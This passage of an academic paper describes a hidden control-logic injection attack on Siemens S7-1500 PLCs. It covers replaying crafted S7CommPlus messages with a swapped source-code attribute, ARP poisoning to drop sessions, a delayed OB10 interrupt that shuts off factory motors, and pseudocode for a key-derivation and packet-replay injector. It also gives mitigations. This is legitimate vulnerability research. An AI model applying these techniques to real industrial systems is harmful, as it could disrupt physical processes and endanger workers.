to a speci c purpose. For instance, the FunctionalObject.Code contains the binary executable code that the PLC runs i.e., the compiled program in the PLC s machine language (MC7+). The Block.AdditionalMac is used as an additional MAC value in the integrity process, and both Block.OptimizedInfo and Block.BodyDescription are equivalent to the program written by the ICS operator which are stored in the PLC and can be later uploaded, upon request, to a TIA Portal project. From the security point of view, these attributes are critical data that is transmitted over the S7CommPlusV3 protocol. Meaning that, if an attacker can intercept the S7 packets con- taining these attributes, and manage successfully to modifythem independently, he is able to cause a source-binary in- consistency as explained in detail in the next section. V. ATTACK DESCRIPTION As in any typical injection attack, we patch our malicious code, Time-of-Day interrupt block OB10, in the original con- trol logic of the target PLC. The CPU checks whether the condition of the interrupt is met in each single execution cycle. Meaning that, the attacker s interrupt block will be always checked but only executed if the date and time of the CPU s clock match the date and time set by the attacker. Hence, we have two cases: 1) The date of CPU s clock matches the date set in the OB10 (the date of the attack). The CPU immediately halts executing OB1, stores the breaking point s location in a dedicated register, and jumps to execute the content of the corresponding interrupt block OB10. 2) The date of the CPU s clock does not match the date set in OB10. The CPU resumes to execute OB1 af- ter checking the interrupt condition without activating the interrupt and without executing the instructions in OB10. Our attack approach presented in this paper is comprised of two main phases: the patching phase (online phase), and the attack phase (of ine phase). Please note that, getting the IP address, MAC address, and model of the victim PLC is an easy task by running our PN-DCP protocol based scanner presented in [5] or other network scanners that can obtain all the information that the attacker needs to communicate with the target device. 154 VOLUME 3, 2022 FIG. 10. High-level overview of the patching phase. A. PATCHING PHASE Fig. 10 shows a high-level overview of this phase. We aim at injecting the PLC with our malicious instructions pro- grammed in the interrupt block OB10. This phase consists of four steps: a) Uploading and downloading the user s program. b) Modifying and updating the control logic program. c) Crafting the S7CommPlus download message. d) Pushing the attacker s message to the victim PLC. To patch the target PLC, we utilize our MITM station which has two main components: 1)AT I AP o r t a l : to retrieve and modify the current control logic program that the PLC runs. 2)A PLCinjector: to download the attacker s code to the PLC. In this work, we developed a python script based on the Scapy5library for this purpose. For a realistic scenario, there are two possible cases that an attacker might encounter after accessing the network. 1) CASE_1: INACTIVE S7 SESSION In this scenario, the legitimate TIA Portal is of ine, and only communicates with the PLC if an upload process is required. Step 1. Uploading & Downloading the User s Program: In this step, we aim at obtaining the decompiled control logic program that the PLC runs, and the S7CommPlus message that the TIA Portal sends to download the original user pro- gram into the PLC. For achieving these goals, we open rst the attacker s TIA Portal and establish a connection with the victim PLC directly. This is possible due to a security gap in 5https://scapy.net/the S7-1500 PLC design. In fact, the PLC does not introduce any security check to ensure that the currently communicating TIA Portal is the same TIA Portal that it communicated with in an earlier session. For this, any external adversary provided with a TIA Portal on his machine can easily communicate with an S7 PLC without any effort. After successfully establishing the communication, we up- load the control logic program on the attacker s TIA Portal. Then we re-download it once again to the PLC and sniff the entire S7CommPlus messages ow exchanged between the attacker s TIA Portal and the victim PLC using the Wireshark software. At the end of this step, the attacker has the program on his TIA Portal, and all the captured download messages saved in a Pcap le for a future use (explained in step 3). Step 2. Modifying & Updating the PLC s Program: After retrieving the user program that the target PLC runs, the at- tacker s TIA Portal displays it in one of the high-level pro- gramming languages that it was programmed with (e.g., SCL). Based on our understanding to the physical process controlled by the PLC, we con gure and program our Time-of-Day interrupt block OB10 to force certain outputs of the system to switch off once the interrupt is being activated (shown later in Fig. 13). Although our malicious code differs from the original code with only an extra small size block (OB10), it is suf cient to confuse the physical process of our experimental set-up. The easiest way to update the program running in the PLC is to use the attacker s TIA Portal. When we downloaded the modi ed control logic, the PLC updated its program success- fully. But, the ICS operator could easily reveal the modi ca- tion by uploading the program from the infected PLC, and VOLUME 3, 2022 155 ALSABBAGH AND LANGEND ERFER: NEW INJECTION THREAT ON S7-1500 PLCS - DISRUPTING THE PHYSICAL PROCESS OFFLINE FIG. 11. Closing the online session using MITM Approach. FIG. 12. Experimental Set-up. comparing the of ine and online programs running on his legitimate TIA Portal and the remote PLC respectively. Step 3. Crafting the S7CommPlus Download Message: To hide our infection from the legitimate user, we rst recorded the S7CommPlus messages exchanged between the attacker s TIA Portal and the PLC while downloading the modi ed pro- gram. As mentioned earlier in Section IV.B, each download message has objects and attributes see Fig. 9. The Program- CycleOB object is dedicated to create a program cycle block in the PLC s memory and has three different attributes: a)Object MAC: donated with the item value ID: Block.AdditionalMac . b)Object Code: donated with the item value ID: Function- alObject.code . c)Source Code: donated with the item value ID: Block.BodyDescription . The Object Code is the code that the PLC reads and pro- cesses, whilst the Source Code is the code that the TIA Portal FIG. 13. The malicious instructions in OB10. decompiles, reads, and displays for the user. Therefore, all what is required to show the user the original code is to modify the S7CommPlus message that the attacker sends; by replacing the Source Code attribute of the ProgramCycleOB object of the attacker s program with the Source Code attribute of the ProgramCycleOB object of the original program. Our investigation showed that the newest model of the SIMATIC PLCs has a serious design vulnerability. The PLC checks the session freshness by running a precaution measure. Hence, it can detect any manipulation and refuses to update its program in case the attributes do not belong to the same session. But surprisingly, this holds true only for the Object MAC and the Object Code attributes. Meaning that, to make the PLC ac- cept the crafted message, our crafted S7CommPlus download message must always have the Object MAC and the Object Code attributes from the same session, whilst the Source Code attribute could be substituted with another attribute from a different session i.e., from a pre-recorded session. All the captured packets containing the attributes of the ProgramCy- cleOB for both the user and attacker programs are presented in the Appendix. Step 4. Pushing the crafted message to the PLC: The crafted S7CommPlus download message contains the following at- tributes: the Object MAC and Object Code attributes of the attacker s program, and the Source Code attribute of the user program. As S7CommPlusV3 exchanges a shared session key between the TIA Portal and the PLC to prevent performing replay attacks, we rst need to bundle the packet with a correct key before we push the crafted message to the PLC. However, exploiting the shared key is out of the scoop of this paper, but it is explained in details in [30]. Once the malicious key exchange is completed, we can easily bundle the key byte- codes with our crafted message. Taking into consideration the appropriate modi cation to the session ID and the integrity elds, we store the nal S7 message (the attacker s message) in a pcap le for pushing it back to the PLC as a replay attack. Algorithm 1 describes the main core of our PLCinjector tool that we use to patch the PLC with the attacker s download message. 156 VOLUME 3, 2022 The PLCinjector tool has two functions. The rst one is utilized to exploit the integrity protection session key that S7CommPLusV3 uses. The session key exchanged in each session between the TIA Portal and S7-1500 PLCs originates from combining 16 bytes of the PLC s ServerSessionChal- lange , precisely the ones located between the bytes 2 and 18, with a random 24-byte KDK that the TIA Portal chooses. Afterwards, a ngerprinting function f( )is used within the sessionKey calculation. Line 5 generates a 24 bytes random quantity ( M), and maps it to the elliptic curve s domain do- nated as PreKey . From the random point PreKey ,w eu s ea Key Derivation Function (KDF) to derive 3-16 bytes quantities identi ed as follows: Key Encryption Key (KEK), Checksum Seed (CS) and Checksum Encryption Key (CEK) . In line 7, theCSgenerates 4096 pseudo-random bytes organized as four 256-word, namely LUT.T h i s LUT is used to calculate a checksum over the KDK andPLC_Challenge . Lines from 8 to 13 depict the elliptic curve key exchange method similar to the one that the TIA Portal uses to encrypt the random generated PreKey . After that, we mask the elliptic curve cal- culations with 20 bytes chosen randomly (donated to xin the algorithm). Line 19 provides an authenticated encryption for the encrypted KDK . Here a non-cryptographic checksum is computed, then encrypted by AES-ECP function. Finally, we add 2 header elds including key ngerprints i.e., 8-byte trun- cated SHA256 hashes of the relevant key with some additional ags see line 20. After establishing a successful session with the victim, the PLC exchanges the malicious generated Session_Key with the attacker machine along the current communicating session. In the next step, our tool executes function 2 to send the attacker s crafted S7 message that contains both the malicious code combined with the generated Session_Key . Our attacking tool can be also used against all the S7-1500 PLCs sharing the same rmware. This is due to the fact that Siemens has designed its new S7 key exchange mechanism assuming that all devices running the same rmware version use also the same public-private key pair mechanism [30]. After a successful injection, the PLC updates its program, processing the Object Code of the attacker s program while it saves the Source Code of the user s program in its mem- ory. Therefore, whenever the user uploads the program from the infected PLC, the TIA Portal will recall, decompile, and display the original program. This kept our injection hidden inside the PLC and the user could not detect any difference between the online and of ine programs. 2) CASE_2: ACTIVE S7 SESSION In this scenario, there is an ongoing active S7 session between the legitimate TIA Portal and the PLC during the patch. As the S7 PLC, by default, allows only one active online session, an attacker is not able to communicate with the PLC. It will immediately refuse any attempt to establish a connection as it is already communicating with the user. For such a scenario, the attacker needs rst to close the current online sessionAlgorithm 1: PLCinjector Tool. Function 1 Get_Session_Key (( ServerSessionChallenge )) 1: Checksum =0 2: PLC_Challenge =ServerSessionChallenge [2:18] 3: KDK=prng (24) 4: Session_Key =HMAC-SHA256 ( f(Challenge ,8)) [:24] 5: PreKey =M(prng(24)) 6: KEK,CEK,CS =KDF (PreKey) 7: LUT[4][256] =hash-init (CS) 8: while point== do 9: x=prng(20) 10: point=fx(G, y, Nonce) 11: EG2=y(point) 12: end while 13: EG1=add(s,PreKey ) 14: forblock in E( KDK )do 15: Checksum =hash (checksum) block, LUT[4][256] 16: end for 17: Checksum[12] =Checksum[12] 40 18: nal_Checksum =hash (Checksum, LUT[4][256] ) 19: key =AES-ECB ( nal_Checksum) 20: KEY =SHA256(key[:24] || DERIVE [:8]) 21: Return KEY END Function 1 Function 2 Replay (pcap le, Ethernet_interface, SrcIP, SrcPort) 22: RecvSeqNum =0 23: SYN =TRUE 24: forpkt in rdpcap (Pcap le) do 25: IP =packet [IP] 26: TCP =packet[TCP] 27: delete IP.checksum 28: IP.src =SrcIP 29: IP.Port =SrcPort 30: ifTCP. ags ==Ack or TCP. ags == RSTACK then 31: TCP.ack =RecvSeqNum+1 32: ifsendp(packet, iface=Ethernet_interface) then 33: SYN =False 34: Continue 35: end if 36: end if 37: Recv =Srp1(packet, iface =Ethernet_interface) 38: RecvSeqNum =rcv[TCP].seq 39: end for END Function 2 between the legitimate user and the PLC, before patching his malicious code. A user can establish an online session with an S7 PLC by enabling the go online feature in the TIA Portal software. Then he can control, monitor, diagnose, download, upload, VOLUME 3, 2022 157 ALSABBAGH AND LANGEND ERFER: NEW INJECTION THREAT ON S7-1500 PLCS - DISRUPTING THE PHYSICAL PROCESS OFFLINE start, and stop the CPU remotely. Once the user has estab- lished an online connection with the PLC, the two parties (the TIA Portal and PLC) start exchanging a speci c mes- sage along the session regularly. This message is known as S7-ACK , and in charge of keeping the session alive. The TIA Portal must always respond to any S7-ACK request sent by the PLC with a S7-ACK replay message. Therefore, for closing the current online session we run our MITM station (presented in [3]) that allows us to intercept and drop all packets sent from the TIA Portal, by performing the well-known ARP poisoning approach. If the PLC does not receive a response from the TIA Portal right after sending an acknowledgment request, it will close the connection with the connected TIA Portal and both go of ine. Fig. 11 describes this scenario. It is worth mentioning that, an attacker can also use dif- ferent ways to close the connection e.g., port stealing, replay attack with go of ine packets, etc. After both the legitimate TIA Portal and the victim PLC turned of ine, the attacker can easily establish a new session with the PLC, using his own TIA Portal. Then he patches the victim device following the same four steps explained in the previous case. For this scenario, our patching approach has limitations. The legitimate TIA Portal was forced to close the session with the PLC. Meaning that, the user can see obviously that he lost the connection with the remote device. In case he attempts to re-connect to the PLC while it is connected to the attacker s TIA Portal, the PLC will refuse his connection request. Our investigations showed that there is no way to re-connect the legitimate TIA Portal to the victim PLC after patching the PLC, unless the ICS operator himself enables go online on his TIA Portal. This abnormal disconnection between the two parties is the only effect of our patch in this scenario. B. ATTACK PHASE After a successful injection, the attacker goes of ine and closes the current communication session with the target PLC. With the next execution cycle, the attacker s program will be executed in the PLC. Meaning that, the interrupt condition of the malicious interrupt block OB10 will be checked in each execution cycle. This block remains in idle mode, and hidden in the PLC s memory as long as the interrupt condition is not met. Once the con gured date and time of the attack matches the date and time of the CPU, the interrupt code will be acti- vated i.e., the execution process of the main program (OB1) is suspended, and the CPU jumps to execute all the instructions that the attacker programmed OB10 with. In our application example, we programmed the OB10 to force certain motors to turn off at a certain time and date when we are completely disconnected from the target s network. VI. EVALUATION, DISCUSSION, AND MITIGATION In this section, we present the implementation of our attack approach, and assess the service disruption of the physical process due to our patch. Afterwards, we discuss our results and suggest possible mitigation methods to protect systems from such a threat.A. LAB SETUP For evaluating our attack approach, we used the Fischertech- nik training factory shown in Fig. 12. It consists of industrial modules such as storage and retrieval stations, vacuum suction grippers, high-bay warehouse, multi-processing station with kiln, a sorting section with color detection, an environment sensor and a pivoting camera. The entire factory is controlled by a SIMATIC S7-1512SP with a rmware V2.9.2, and pro- grammed by TIA Portal V16. The PLC connects to a TXT controller via an IoT gateway. The TXT controller serves as a Message Queuing Telemetry Transport (MQTT) broker and an interface to the schertechnik cloud. The factory we used in our experiment provides two in- dustrial processes. Storing and ordering materials. The default process cycle begins with storing and identifying the material i.e., workpiece. The factory has an integrated NFC tag sensor storing production data that can be read out via an RFID NFC module. This allows the user to trace the workpieces digitally. The cloud displays the part s colour and its ID-number. Af- terwards, the vacuum gripper places suction on the material and transports it to the high bay warehouse which applies a rst-in rst-out principle for the outsourcing. All goods that were stored could be ordered again online using a dashboard. The desired product and the corresponding color are selected by the user, and then placed in the shopping cart. The suction gripper passes the workpiece from one step to the next, and then moves back to the sorting system once the production is complete. The sorting system receives the allocation com- mand as soon as the color sorter detects the proper color. The material is sorted using pneumatic cylinders. Finally the production data is written on the material at the end of the production process, and the nished product will be provided for collection. B. IMPLEMENTATION In our experiment, we found that the vacuum suction gripper (VGR) is involved in all the industrial processes that the Fis- chertechnik system operates. Therefore, if we could disrupt its functionality, then the entire system would be impacted. The VGR module moves with the help of 8 mini motors: vertical motor up (%Q2.0), vertical motor down (%Q2.1), hor- izontal motor backwards (%Q2.2), horizontal motor forwards (%Q2.3), turn motor clockwise (%Q2.4), turn motor anti- clockwise (%Q2.5), compressor (%Q2.6), and valve vacuum (%Q2.7). Therefore, for exploiting the VGR, we programmed our OB10 to force all the 8 motors to switch off at the point zero for the attack as shown in Fig. 13. After patching the PLC with our malicious block, and be- fore the Time-of-Date interrupt being activated, we did not record any physical impact and the Fischertechnik system keeps operating normally. Once the CPU clock matches the attack time that we set, we noticed that the VGR module stopped moving. Furthermore, the workpiece that is being transported by the gripper has fallen down, as the compressor, which provides the appropriate air ow to carry the good, 158 VOLUME 3, 2022 FIG. 14. Boxplot presenting the measured execution cycle times of OB1. was turned off. This led to an incorrect operation, and the movement sequence of the workpieces was disrupted. For a real-world heavy factory e.g. automobile manufacturing in- dustry, such an attack scenario might be seriously dangerous and even cost human lives. C. EVALUATION To assess the impact of our patch on the physical process controlled by the infected device accurately, we measured and analyzed the differences of the execution cycle times for the control logic program that the PLC runs in three different scenarios:rNormal Operation: before patching the PLC as a base- line.rIdle Attack: after patching the PLC and before the in- terrupt is being activated i.e., the PLC is running the attacker s program.rActivated Attack: after the interrupt is being executed. Siemens PLCs, by default, store the time of the last execution cycle in local variable of OB1 called OB1_PREV_CYCLE . Therefore, we added a small SCL code snippet to our control program which stores the last cycle time in a separate data block. Then we recorded 4096 execution cy- cle times for each scenario, calculated the arithmetic median value, and used the Kruskal-Wallis and the Dunn s Multiple Comparison test for statistical analysis. All the results are presented as boxplots in Fig. 14. In order to make our resulting boxplots clearer and easier to read, we de ne the following parameters: 1) First quartile (Q1): represents the middle value (cycle time) between the smallest value and the median of the total recorded values (4096 execution cycle times). 2) Median (Q2): represents the middle value of the total recorded values. 3) Third quartile (Q3): represents the middle value be- tween the highest value and the median of the total values recorded. 4) Interquartile Range (IQR): represents all the values be- tween 25% to 75% of the total recorded values. 5) Maximum: represents Q3 + 1.5*IQR 6) Minimum: represents Q1 - 1.5*IQR7) Outliers: represents all the values that they are higher and lower than the maximum and minimum values re- spectively. Our measurements show that the calculated median value (Q2) of executing the OB1 for the infected program is approx. 38 ms, and differs slightly from the median value of executing the OB1 for the original program which is almost 36 ms. The Q1, and Q3 values for the infected program are as high as 36 ms and 40 ms respectively. They are a bit higher compared to the recorded ones for the original program i.e., 35 ms and 37 ms for Q1 and Q3 respectively. Meaning that, checking the interrupt condition of our malicious block in each execu- tion cycle does not disrupt executing the control logic, and the Fischertechnik system keeps operating normally. Please note that, executing the attacker s program should not exceed the overall maximum execution time of 150 ms. Our mea- surements clearly show that our injection did not trigger this timeout as we recorded a maximum value as high as 47 ms which is still quite small compared to 150 ms. Once the CPU s date and time match the date and time that we set to trigger our attack, the CPU jumps to execute the malicious instruction existing in OB10, and the attack is activated. Our measurements, for this scenario, did not record any higher median values in the execution cycles compared to the prior scenario i.e., when the attack is idle. This is because we set the OB10 to occur only once, so the PLC processes the instructions existing in OB10, and resumes executing OB1 from the last point before the interrupt. But it keeps checking the condition of the interrupt in each cycle as long as OB10 is existing in the control logic program. However, our approach allows attackers to adjust the repeating of the interrupt (see Section III), as well as to program the interrupt block on their will causing different impacts in the physical process of the target system. D. DISCUSSION Based on our analysis, we can conclude that when our patch is in idle mode, the execution cycle times of the infected program are almost as high as the execution times of the orig- inal program. Therefore, the ICS operator would not record any abnormality in executing the control logic as the TIA Portal software will not report any differences before and after the patch. Furthermore, our attack approach always shows VOLUME 3, 2022 159 ALSABBAGH AND LANGEND ERFER: NEW INJECTION THREAT ON S7-1500 PLCS - DISRUPTING THE PHYSICAL PROCESS OFFLINE the original program to the ICS operator, despite the PLC is running a different one. This is due to the fact that the original Source Code attribute is always sent back to the TIA Portal whenever the user requires the program from the infected PLC. Due to all that, our attack is capable of staying in the device in idle mode for a long time without being revealed, and the only way to remove it is to re-program the device once again by the ICS Operator. However, in critical facilities and power plants, re-programming the PLCs is not a common case unless there is a certain reason to do so. The success of our attack approach on S7-1500 PLCs is, indeed, based on serious design vulnerabilities in the newest model of S7 PLCs and security issues in the integrity mecha- nism used in the latest version of the S7CommPlus protocol. We found that the PLC does not authenticate the TIA Portal as we expected, and only con rms the session freshness. This allows an external attacker to perform replay attacks against the PLC, keeping in mind that he has always to provide the correct Session_Key in his crafted S7 messages, otherwise the PLC will detect that the expected S7 message received has been modi ed and will refuse to update its program. Siemens claimed that the newest PLCs are resilient against replay attacks, but unfortunately we could maliciously update the PLC s program by sending a crafted S7 download message. Another vulnerability we detected during our investigations is that there is no security pairing between the TIA Portal and the PLC i.e., the PLC does not ensure that the TIA Portal it is currently-communicating with, is the same TIA Portal than in a previous session. This allows an attacker who has a TIA Portal installed on his machine to easily access the PLC without any efforts. Although this holds true as long as the target PLC is not already connected online to the legitimate TIA Portal. Our results showed that an attacker can still com- municate and inject the victim after closing the current session between the TIA Portal and the PLC. It is also noticed that Siemens provides its 1500 CPUs with a sophisticated integrity checking algorithm which checks the validity of any S7 mes- sage received. But unfortunately, this does not hold true for the entire ProgramCycleOB Object. Meaning that, the CPU checks only the integrity of the Object MAC and the Object Code , and has no integrity check for the Source Code . So, if an attacker replaces the Source Code from another session with a new one, the PLC will authenticate the download message and run the attacker s program. This is a signi cant security gap in the design of the integrity mechanism for S7-1500 PLCs, as it keeps the injection hidden inside the memory. E. MITIGATION The fundamental solution would be completely redesigning the integrity check mechanism that the newest S7 PLCs use. The new mechanism should include a security pairing and mutual authentication between the PLC and TIA Portal. But we are aware of the fact that such a solution would also incur an extremely high cost and may have backward compatibility issues. Furthermore, ICS devices are usually not software updated on time, and have a very long life-cycle comparedto common IT devices. For all that, we should expect that insecure devices will keep employed in real-world ICS envi- ronments for a long time. In this term, network detection can be seamlessly integrated into the existing ICS setting. In par- ticular, control logic detection [36], and veri cation [41], [42] can be utilized to alleviate current situation. As our injection was hidden in the PLC memory, so partitioning the memory space and enforcing memory access control [37] could also be a reasonable solution. Other suggestions include employ- ing standard cryptography methods such as digital signatures (for messages like control logic manipulation), but also us- ing network monitoring tools like snort [38], ArpAlert [39], and ArpWatchNG [40] for revealing any attack involving MITM attacks. Furthermore, a mechanism to check the pro- tocol header which contains information about the type of the payload is also recommended as a solution to detect and block any potential unauthorized transfer of the control logic. However, from our perspective the best solution to prevent injection attacks is to separate the information technology (IT) domain from operational technology networks by using a Demilitarized Zone (DMZ). VII. CONCLUSION This paper presented a new threat on the newest SIMATIC PLCs. Our attack approach is based on injecting the attacker s malicious code once he gains access to the target s network, but activating his patch later without a need to be connected at the time of the attack. Our investigation identi ed a few design vulnerabilities in the new integrity method that the S7-1500 PLCs use. Based on our ndings, we managed successfully to conduct an injection attack, by patching the tested PLC with a Time-of-Day interrupt block (OB10). This block allows us to activate our patch, and to confuse the physical process without being connected to the victim at the point zero for the attack. We analyzed and evaluated the possibility of revealing our in- jection by the ICS operator. Our experimental results showed that the original control logic program is always shown to the user, whilst the PLC runs the attacker s program. In addition, our injection does not increase the execution times of the control logic. Hence, the physical process is not impacted when our patch is in idle mode. To summarize, our attack is a very serious threat targeting ICSs, as attackers need to be only online during the patch and can close all the connections to the target s network afterwards. Therefore, they will not be detected even if the ICS operators re-activate the security mea- sure. Finally, we provided some recommendations to secure ICSs from such a severe threat. Our attack approach is feasible for all S7-1500 PLCs with a rmware 2.9.2 or lower. However, Siemens updated the rmware for all S7-1500 CPUs in December, 2021 to the newer version 2.9.4. Therefore, a further investigation is re- quired to test the security of the latest rmware version. Fur- thermore, a deeper analyzes of the advanced S7CommPlus protocol aiming at understanding the private key mechanism that PLCs implement can be also be a part of future works. We believe that, if attackers manage successfully to extract the 160 VOLUME 3, 2022 private key from an S7-1500 PLC, then stronger attacks e.g., fully man in the middle, session-hijacking, and impersonation PLC attacks might become possible for the entire products line. VII. APPENDIX. PACKETS CAPTURE FIG. 15. Object MAC Attribute - User Program. FIG. 16. Object Code Attribute - User Program. FIG. 17. Source Code Attribute - User Program. FIG. 18. Object MAC Attribute - Attacker Program. FIG. 19. Object Code Attribute - Attacker Program. FIG. 20. Source Code Attribute - Attacker Program. REFERENCES [1] W. Alsabbagh and P. Langend rfer, A fully-blind false data injection on PROFINET i/o systems, in Proc. IEEE 30th Int. Symp. Ind. Elec- tron., 2021, pp. 1 8. [2] H. Wardak, S. Zhioua, and A. Almulhem, PLC access control: A security analysis, in Proc. World Congr. Ind. Control Syst. Secur. , 2016, pp. 1 6. [3] W. Alsabbagh and P. Langend rfer, A stealth program injection attack against S7-300 PLCs, in Proc. 22nd IEEE Int. Conf. Ind. Technol. , 2021, pp. 986 993. [4] D. Beresford, Exploiting siemens simatic S7 PLCs, in Black Hat USA , 2011, pp. 723 733. [5] W. Alsabbagh and P. Langend rfer, A remote attack tool against siemens S7-300 controllers: A practical report, in 11. Jahreskollo- quium Kommunikation in der Automat. , 2020. [6] J. Klick, S. Lau, D. Marzin, J. Malchow, and V. Roth, Internet-facing PLCs-a new back ori ce, in Black Hat USA , 2015, pp. 22 26. [7] A. Spenneberg, M. Br ggemann, and H. Schwartke, PLC-blaster: A. worm living solely in the PLC, in Black Hat Asia Marina Bay Sands , 2016, pp. 1 16. [8] N. Govil, A. Agrawal, and N. O. Tippenhauer, On ladder logic bombs in industrial control systems, in Proc. Int. Workshop Secur. Ind. Control Syst. Cyber-Physical Syst. , 2018, pp. 110 126. [9] K. Sushma, A. Nehal, Y. Hyunguk, and A. Irfan, CLIK on PLCs! Attacking control logic with decompilation and virtual PLC, in Proc. Netw. Distrib. Syst. Secur. Symp. , 2019, [Online]. Available: https: //ruoyuwang.me/bar2019/pdfs/bar2019- nal74.pdf. [10] W. Alsabbagh and P. Langend rfer, Patch now and attack later exploiting S7 PLCs by time-of-day block, in Proc. 4th IEEE Int. Conf. Ind. Cyber-Phys. Syst. , 2021, pp. 144 151. [11] W. Alsabbagh and P. Langend rfer, A control injection attack against S7 PLCs manipulating the decompiled code, IECON 2021 Proc. 47th Annu. Conf. IEEE Ind. Electron. Soc., Toronto, ON, Canada, Oct., 2021, pp. 1 8. [12] N. Falliere, Exploring Stuxnet s PLC infection process, in Virus Bul- letin Covering Global Threat Landscape Conf. , Sep. 2010, [Online]. Available: http://www.symantec.com/connect/blogs/exploringstuxnet- s-plc-infection-process. [13] Y. Hyunguk and A. Irfan, Control Logic Injection Attacks on Industrial Control Systems . Berlin, Germany: Springer, 2019. VOLUME 3, 2022 161 ALSABBAGH AND LANGEND ERFER: NEW INJECTION THREAT ON S7-1500 PLCS - DISRUPTING THE PHYSICAL PROCESS OFFLINE [14] L. Garcia et al. , Hey my malware knows physics! Attacking PLCs with physical model aware rootkit, Proc. 24th Ann. Netw. Distrib. Syst. Secur. Symp ., 2017, pp. 1 15, doi: 10.14722/ndss.2017.23313 . [15] Z. Basnight et al. , Firmware modi cation attacks on programmable logic controllers, Int. J. Crit. Infrastructure Protection ,v o l .6 , pp. 76 84, 2013. [16] Attackers Deploy New ICS Attack Framework TRITON, and Cause Operational Disruption to Critical Infrastructure . Accessed: Apr. 12, 2021. [Online]. Available: https://www. reeye.com/blog/threat- research/2017/12/attackers-deploy-new-ics-attack-framework- triton.html [17] R. M. Lee, M. J. Assante, and T. Conway, Analysis of the cyber- attack on the ukrainian power grid, Tech. Rep., SANS E-ISAC, Mar. 18, 2016. [Online]. Available at: https://ics.sans.org/media/ESAC_ SANS_Ukraine_DUC_5.pdf [18] S. Senthivel et al. , Denial of engineering operations attacks in in- dustrial control systems, in Proc. 18th ACM Conf. Data Appl. Secur. Privacy , 2018 pp. 319 329. [19] G. liang, S. R. Weller, J. Zhao, F. Luo, and Z. Y. Dong, The 2015 Ukraine blackout: Implications for false data injection attacks, IEEE Trans. Power Syst. , vol. 32, no. 4, pp. 3317 3318, Jul. 2017. [20] N. Falliere, L. O. Murchu, and E. Chien, W32. Stuxnet Dossier, Symantec Corp., Security Response, Tempe, AZ, USA, White Paper, 2011. [21] R. Langner, Stuxnet: Dissecting a cyberwarfare weapon, IEEE Secur. Privacy , vol. 9, no. 3, pp. 49 51, May/Jun. 2011. [22] T. De Maizi re, Die Lage Der IT-Sicherheit in Deutschland 2014, The German Federal Of ce for Information Security, German Federal Of ce Inf. Secur. , 2014. [Online]. Avail- able: https://www.bsi.bund.de/SharedDocs/Downloads/DE/BSI/ Publikationen/Lageberichte/Lagebericht2014.pdf [23] Siemens ProductCERT and Siemens CERT, Security advisory, Pers. commun. , 2019. [Online]. Available: https://new.siemens.com/global/ en/products/services/cert.html [24] IPCS Automation, Market share of different PLCs, 2018, [On- line]. Available: https://ipcsautomation.com/blog-post/market-share- of-different-plcs/ [25] S. Frances, Top 20 programmable logic controller manufacturers, Robotics Automation News , 2020. [Online]. Available: https: //roboticsandautomationnews.com/2020/07/15/top-20-programmable- logic-controller-manufacturers/33153/ [26] Statista Research Department, Programmable logic controllers: Global manufacturer market share 2017, 2021, [Online]. Available: https://www.statista.com/statistics/897201/global-plc-market-share- by-manufacturer/ [27] G. Benmocha, E. Biham, and S. Perle, Unintended features of APIs: Cryptanalysis of incremental HMAC, in Selected Areas in Cryptogra- phy.(Lecture Notes in Computer Science 12804) O. Dunkelman, M. J. Jacobson, Jr, and C. O Flynn, Eds. Berlin, Germany: Springer, 2021. [28] National Institute of Standards and Technology, CVE-2019-10929, National Vulnerability Database, 2019, [Online]. Available: https://nvd. nist.gov/vuln/detail/CVE-2019-10929 [29] T. Wiens, S7comm wireshark dissector plugin, SourceForge , 2011. [Online]. Available: http://sourceforge.net/projects/ s7commwireshark [30] E. Biham, S. Bitan, A. Carmel, A. Dankner, U. Malin, and A. Wool, Rogue7: Rogue engineering-station attacks on S7 simatic PLCs, in Black Hat USA , 2019, [Online]. Available: https://i.blackhat.com/USA19/Thursday/us-19-Bitan-Rogue7-Rogue- Engineering-Station-AttacksOn-S7-Simatic-PLCs-wp.pdf. [31] C. Lei, L. Donghong, and M. Liang, The spear to break the secu- rity wall of S7CommPlus, in Black Hat USA , 2017, [Online]. Avail- able: https://www.blackhat.com/docs/eu-17/materials/eu-17-Lei-The- Spear-ToBreak%20-The-Security-Wall-Of-S7CommPlus-wp.pdf. [32] H. Hui and K. McLaughlin, Investigating current PLC security issues regarding siemens S7 communications and TIA poral, in Proc. Ind. Control Syst. Cyber Secur. Res. , 2018, pp. 67 73. [33] A. Menezes and S. Vanstone, Elliptic curve cryptosystems and their implementation, J. Cryptol. , vol. 6, pp. 209 224, 1993. [34] F. Wei erg, Analysis of the S7CommPlus protocol in terms of cryp- tography used, (in German), Mar. 26, 2018. [Online]. Available: https: //www.os-s.net/publications/thesis/Bachelor_Thesis_Weissberg.pdf [35] A. Ayub, H. Yoo, and I. Ahmed, Empirical study of PLC authentication protocols in industrial control systems, in Proc. IEEE Secur. Privacy Workshops , 2021, pp. 383 397.[36] H. Yoo, S. Kalle, J. Smith, and I. Ahmed, Overshadow PLC to detect remote control-logic injection attacks, in Proc. Int. Conf. Detection Intrusions Malware, Vulnerability Assessment , 2019, pp. 109 132. [37] C. H. Kim et al. , Securing real-time microcontroller Systems through customized memory view switching, in Proc. Netw. Distrib. Syst. Se- cur. Symp. , 2018, doi: 10.14722/ndss.2018.23117 . [38] M. Roesch et al. , Snort: Lightweight intrusion detection for networks, Lisa, vol. 99, no. 1, pp. 229 238, 1999. [39] C. H. Kim et al. , Securing real-time microcontroller systems through customized memory view switching, Network Distributed Syst. Secu- rity (NDSS) Symp. , 2018, doi: 10.14722/ndss.2018.23117 . [40] C. Leres et al. , arpwatch Description, KaliTools, 2021, [Online]. Available: https://en.kali.tools/?p=1411. [41] S. Zonouz, J. Rrushi, and S. McLaughlin, Detecting industrial control malware using automated PLC code analytics, IEEE Secur. Privacy , vol. 12, no. 6, pp. 40 47, Nov./Dec. 2014. [42] M. Zhang et al. , Towards automated safety vetting of PLC code in real- world plants, in Proc. IEEE Symp. Secur. Privacy , 2019, pp. 522 538. [43] Siemens, S7-300 CPU 31xC and CPU 31x: Technical speci cations, 2011. [Online]. Available: https://cache.industry.siemens.com/dl/ les/ 906/12996906/att_70325/v1/s7300_cpu_31xc_and_cpu_31x_manual_ en-US_en-US.pdf [44] H. Hui, K. McLaughlin, and S. Sezer, Vulnerability analysis of S7 PLCs: Manipulating the security mechanism, Int. J. Crit. Infrastructure Protection , vol. 35, 2021, Art. no. 100470. [45] S. Mclaughlin, On dynamic malware payloads aimed at programmable logic controllers, in HotSec , 2011, [Online]. Available: http://www. stephenmclaughlin.org/hotsec-2011.pdf. [46] S. McLaughlin and P. McDaniel, SABOT: Speci cation-based payload generation for programmable logic controllers, in Proc. ACM 